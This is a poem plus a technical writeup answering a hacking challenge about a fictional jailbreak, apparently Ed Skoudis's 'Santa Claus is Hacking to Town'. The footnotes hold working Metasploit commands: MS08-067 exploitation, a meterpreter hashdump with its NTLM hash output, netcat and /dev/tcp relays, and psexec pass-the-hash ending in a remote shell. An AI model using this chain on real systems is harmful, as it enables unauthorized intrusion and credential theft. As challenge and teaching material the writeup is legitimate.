santaclause-is-hacking-to-town.txt

This is my response to Ed Skoudis' challenge, "Santa Claus is Hacking, to Town!"
http://www.ethicalhacker.net/content/view/218/2/

First, a poem that describes the situation and then the solution. Then, the boring part the commands and results in non-poem form. 
------------
'twas the night before Christmas and Kris was in jail
And his friends were upset because they couldn't make bail

"202c," they said, "how could that be done?"
"I thought we were in Canada, with 342.1?"

They tried to find Sombertown on Google maps
But Javascript was required, so they couldn't find crap

Meanwhile Santa, who was trapped in his cell,
Fires up his Mac to see what he can tell

"Now ping, now traceroute, now metasploit and Nmap! 
On cain, on able, on wireshark and netcat!"

Ere it was booted, Jessica asked if it was hard
To sneak his macbook past the prison guard

"No problem!" said Kris, "I do it every day!"
"This Macbook is barely a computer anyway!"

Just then, the jailmaster walked to his box
Past the server that could open the locks

Jailmaster logged on with his password from hell
But what it was, kris could not tell

Now that his macbook was finally booted, 
Kris tried using Nmap to find the computer

"Lo! What's this?" he said with a grin
Another box showed up as he scratched his chin

"Laptop and web1 I can see from this box"
"I wonder what web1 would tell firefox?"

Opening his browser Kris giggled with glee
As he typed shell commands into form #3

"Shell injection? That's so totally cool!"
Said Kris as he fired up his metasploit tool

Kris wondered if the laptop would fall to '067?
And as the shell popped up, he said "I'm in heaven!"

Now with two boxes under full control,
Kris had to find a way to open the door! 

"What tools do we have?" asked Kris with a grin
"With Nmap and Netcat we'll surely get in!"

"Psexec," said Jessica, "metasploit, and netcat"
"One tool under 1 meg, and of course Nmap"

"One tool?" laughed Kris, "just download some LOLCats"
"I already have enough to do my l33t hacks"

"You can keep your psexec program too!"
So poor Mr. Warlock had nothing to do

Firing up metasploit[1] with a glance at the guard table,
Kris selected meterpreter as the payload

"use priv" he ran, and "hashdump" too
With the hashes in hand he knew what to do

With a wave of his hand and no delay,
On his macbook he created a netcat relay[2]

Then on Web1, quick as could be
He set up a relay with /dev/tcp[3]

"Wow" said Jessica, as Kris still typed,
Tools like Core Impact are way overhyped!

Running metasploit[4] on his laptop he knew what to do next,
Setting RHOST to "local" and exploit to "psexec"

SMBUser was "jailmaster" and SMBPass was "aad3b435b51404eeaad3b435b51404ee:d3ec7135d0caab12139108c13e7da38f"
After all that typing, Kris said, that's enough!

Recognizing the hash encoded with NTLM,
The prison door computer let kris's connection in

When the door clicked open they let out a shout! 
Thanks to Kris, they'd all gotten out! 

And while he was doing this, what did Winter Warlock do?
He downloaded I Can Has Cheezburger, and enjoyed it too!
------------------
That was the poem version, here are more detailed writeups of the commands:

[1] metasploit (1)
Kris used metasploit to get into the jailmaster's computer:
$ metasploit
> use exploit/windows/smb/ms08_067_netapi 
> set RHOST jailmasterlaptop
> set PAYLOAD windows/meterpreter/bind_tcp
> exploit

Once Meterpreter was running, he loads the 'priv' library and uses 'hashdump' to get the list of hashes:
meterpreter > use priv
meterpreter > hashdump
jailmaster:1006:aad3b435b51404eeaad3b435b51404ee:d3ec7135d0caab12139108c13e7da38f:::

[2] netcat relay
Kris uses a netcat relay on his macbook (I guess on the Linux VM) to listen for connections from two sources, and link them together:
$ mknod pipe p
$ cat pipe | nc -l -p 4444  | nc -l -p 5555 > pipe

[3] /dev/tcp relay
Kris creates a /dev/tcp relay using the os command injection vulnerability he found (I figured this was better than assuming that his netcat version would run on the remote system). He does it basically the same way:
$ mknod pipe p
$ cat pipe | /dev/tcp/santaslaptop/5555 | /dev/tcp/doorcomputer/445 > pipe

Now, any program that connects to santaslaptop:4444 will be connected through to doorcomputer:445. 

If that doesn't work (ie, the system is locked down and /dev/tcp doesn't exist), then Kris would have to get Netcat off his laptop (using wget or telnet or something) and create a second netcat relay:
$ mknod pipe p
$ cat pipe | nc santaslaptop 5555 | nc doorcomputer 445 > pipe

[4] metasploit (2)
Finally, Kris uses metasploit's psexec exploit along with the hash he pulled to gain access. 
$ metasploit
> use windows/smb/psexec
> set RHOST localhost
> set RPORT 4444
> set PAYLOAD windows/shell/bind_tcp
> set SMBUser jailmaster       
> set SMBPass aad3b435b51404eeaad3b435b51404ee:d3ec7135d0caab12139108c13e7da38f
msf exploit(psexec) > exploit
C:\WINNT\system32>

With shell access to the doorcomputer (at the jailmaster's level), Kris runs dooropen.exe and they all escape!

(Oh, and for what it's worth, the hash I used represents 50 'a's. If I had to type a 50-character password, that's what I'd be using! :) )